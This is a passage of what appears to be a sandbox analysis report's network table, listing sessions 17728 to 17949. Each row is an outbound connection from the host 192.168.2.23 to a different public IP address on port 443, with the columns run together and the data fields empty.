                                                17728192.168.2.2334684102.82.239.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17729192.168.2.2342564122.109.113.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17730192.168.2.234607687.95.28.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17731192.168.2.2354862134.67.199.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17732192.168.2.234288035.35.137.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17733192.168.2.2338392130.130.118.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17734192.168.2.23507169.130.115.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17735192.168.2.235238843.47.83.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17736192.168.2.2343470120.109.70.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17737192.168.2.233299070.28.255.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17738192.168.2.234313896.40.123.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17739192.168.2.2338580217.165.204.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17740192.168.2.234727458.241.41.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17741192.168.2.2344622123.154.6.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17742192.168.2.2343416169.216.128.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17743192.168.2.2360492213.169.200.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17744192.168.2.233456844.132.142.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17745192.168.2.2335626120.182.125.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17746192.168.2.2354452126.197.243.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17747192.168.2.2348390212.64.43.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17748192.168.2.2345006102.201.112.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17749192.168.2.2346594160.147.129.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17750192.168.2.235314072.1.187.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17751192.168.2.2338250119.144.58.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17752192.168.2.233949285.48.51.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17753192.168.2.2352126147.97.5.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17754192.168.2.23496101.105.25.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17755192.168.2.2360094128.177.250.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17756192.168.2.2333314185.211.147.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17757192.168.2.23424264.159.85.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17758192.168.2.234622640.235.46.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17759192.168.2.2337256201.169.231.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17760192.168.2.2340446143.17.46.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17761192.168.2.235639679.112.110.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17762192.168.2.2360574166.90.129.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17763192.168.2.2339956143.146.176.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17764192.168.2.2352276201.2.113.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17765192.168.2.2346562176.10.17.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17766192.168.2.233915896.174.140.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17767192.168.2.2339860159.208.120.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17768192.168.2.2357846139.190.114.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17769192.168.2.2338256148.134.133.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17770192.168.2.234710067.234.195.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17771192.168.2.2334758199.183.249.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17772192.168.2.2337946165.80.198.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17773192.168.2.2342324192.53.232.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17774192.168.2.2335306155.87.49.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17775192.168.2.2355722138.144.131.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17776192.168.2.2360928164.203.89.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17777192.168.2.2352868178.107.188.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17778192.168.2.234014681.109.64.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17779192.168.2.2353312166.43.144.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17780192.168.2.235535697.57.101.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17781192.168.2.2353348156.206.158.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17782192.168.2.234366646.144.206.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17783192.168.2.2343276136.145.175.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17784192.168.2.235248479.73.32.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17785192.168.2.23453242.63.228.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17786192.168.2.23366389.55.131.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17787192.168.2.2349508187.222.81.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17788192.168.2.2347924189.123.61.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17789192.168.2.235458284.167.61.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17790192.168.2.2357632106.215.96.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17791192.168.2.2352368186.85.18.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17792192.168.2.2345840145.123.104.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17793192.168.2.2352204142.147.250.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17794192.168.2.23533185.13.160.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17795192.168.2.2355588105.246.82.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17796192.168.2.2341382143.139.44.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17797192.168.2.23542328.28.244.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17798192.168.2.2343556120.219.128.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17799192.168.2.2356598142.236.129.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17800192.168.2.2336324195.180.132.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17801192.168.2.2351684209.153.7.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17802192.168.2.2340172176.142.208.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17803192.168.2.234296481.166.133.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17804192.168.2.2350702142.216.127.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17805192.168.2.2344372128.148.162.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17806192.168.2.2333186155.73.141.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17807192.168.2.233284023.29.139.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17808192.168.2.235316899.26.194.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17809192.168.2.234083624.236.32.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17810192.168.2.2333146158.54.89.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17811192.168.2.2354114167.247.182.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17812192.168.2.2352576176.112.23.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17813192.168.2.2354396142.120.89.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17814192.168.2.2358760146.38.23.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17815192.168.2.2336858113.218.181.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17816192.168.2.2349518220.152.18.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17817192.168.2.233580068.34.214.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17818192.168.2.233851253.46.81.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17819192.168.2.234772845.110.12.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17820192.168.2.234271635.36.139.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17821192.168.2.234221697.185.211.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17822192.168.2.234033060.137.255.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17823192.168.2.235358620.30.111.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17824192.168.2.2349402136.195.6.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17825192.168.2.2350272128.59.177.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17826192.168.2.234874448.90.40.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17827192.168.2.233280692.188.175.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17828192.168.2.235365661.126.122.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17829192.168.2.2337230168.110.103.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17830192.168.2.2357018148.253.152.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17831192.168.2.2341332175.33.121.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17832192.168.2.2335050164.10.160.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17833192.168.2.2351888135.251.212.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17834192.168.2.2347928136.39.239.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17835192.168.2.2340548103.111.109.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17836192.168.2.2345018185.9.105.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17837192.168.2.2345338150.102.113.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17838192.168.2.2355556112.41.114.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17839192.168.2.2349204151.204.173.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17840192.168.2.2353460143.16.229.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17841192.168.2.2342056100.234.84.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17842192.168.2.2333140217.213.172.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17843192.168.2.2357670153.62.51.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17844192.168.2.233603899.53.97.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17845192.168.2.2349032180.146.22.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17846192.168.2.234893220.154.108.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17847192.168.2.233428646.138.89.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17848192.168.2.2338906191.213.180.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17849192.168.2.2345516174.123.128.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17850192.168.2.2355622111.195.153.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17851192.168.2.2358704147.39.241.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17852192.168.2.234119846.52.98.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17853192.168.2.235976274.198.151.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17854192.168.2.236002837.57.173.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17855192.168.2.234165427.226.153.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17856192.168.2.234030484.84.81.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17857192.168.2.2347516120.234.245.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17858192.168.2.2340194169.17.16.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17859192.168.2.23536528.251.182.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17860192.168.2.2347424198.193.73.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17861192.168.2.2336182117.148.206.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17862192.168.2.233464652.94.3.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17863192.168.2.234690832.197.24.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17864192.168.2.2349166115.91.37.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17865192.168.2.2333724210.212.179.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17866192.168.2.2355654137.172.106.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17867192.168.2.2351024113.244.41.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17868192.168.2.234473880.230.42.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17869192.168.2.233735277.245.83.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17870192.168.2.234515223.197.239.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17871192.168.2.234365614.10.136.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17872192.168.2.236016893.4.78.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17873192.168.2.2357932168.94.36.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17874192.168.2.2346936174.196.204.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17875192.168.2.2350512119.190.8.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17876192.168.2.2343908163.23.234.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17877192.168.2.2351844197.229.167.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17878192.168.2.2356404138.218.12.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17879192.168.2.2335470151.229.14.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17880192.168.2.2344344117.58.17.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17881192.168.2.2341680218.123.107.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17882192.168.2.2353436172.83.126.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17883192.168.2.2344272223.194.120.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17884192.168.2.2346050192.137.150.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17885192.168.2.2338838108.208.220.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17886192.168.2.2359958157.28.65.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17887192.168.2.2346778105.109.234.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17888192.168.2.23387988.74.36.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17889192.168.2.234885442.56.71.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17890192.168.2.2349750188.196.96.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17891192.168.2.2353004105.151.100.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17892192.168.2.235685218.187.52.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17893192.168.2.2348726139.142.49.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17894192.168.2.234527285.161.129.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17895192.168.2.2345918176.208.105.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17896192.168.2.235335469.76.176.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17897192.168.2.2352536133.30.213.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17898192.168.2.2333858153.111.220.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17899192.168.2.2334160203.161.138.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17900192.168.2.2334010205.136.249.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17901192.168.2.2341442180.50.242.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17902192.168.2.2333906161.196.4.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17903192.168.2.235847499.68.173.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17904192.168.2.233402640.190.123.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17905192.168.2.2335080155.60.100.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17906192.168.2.2338084211.74.35.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17907192.168.2.2341924102.54.148.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17908192.168.2.2353076190.96.135.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17909192.168.2.2355966171.186.169.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17910192.168.2.234247059.137.194.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17911192.168.2.2332968109.77.111.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17912192.168.2.2336540117.47.215.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17913192.168.2.2355986152.180.178.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17914192.168.2.233995684.43.47.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17915192.168.2.2346636201.245.214.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17916192.168.2.235999469.42.184.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17917192.168.2.2357848179.207.164.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17918192.168.2.2349478216.249.223.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17919192.168.2.234884474.83.60.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17920192.168.2.2343300194.29.114.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17921192.168.2.2347700219.193.253.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17922192.168.2.234379868.154.211.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17923192.168.2.2354858193.101.10.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17924192.168.2.2335530166.75.29.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17925192.168.2.2358808181.228.166.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17926192.168.2.2343664114.185.106.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17927192.168.2.234150039.187.222.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17928192.168.2.2333902133.178.201.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17929192.168.2.2354210154.169.150.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17930192.168.2.235452027.9.161.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17931192.168.2.2354748198.135.239.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17932192.168.2.234802473.245.224.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17933192.168.2.2341028114.152.74.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17934192.168.2.2346442167.10.92.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17935192.168.2.235402292.208.7.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17936192.168.2.2356000177.151.5.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17937192.168.2.2335754204.192.73.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17938192.168.2.2355206108.82.144.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17939192.168.2.235645696.108.201.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17940192.168.2.234212671.244.136.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17941192.168.2.233616473.70.103.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17942192.168.2.2333822202.204.204.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17943192.168.2.235443454.9.198.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17944192.168.2.2333976176.207.146.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17945192.168.2.2346912142.206.117.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17946192.168.2.2358348149.20.141.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17947192.168.2.233927677.108.152.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17948192.168.2.2346654152.70.83.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17949192.168.2.2359988223.39.62.211443
                                                TimestampBytes transferredDirectionData


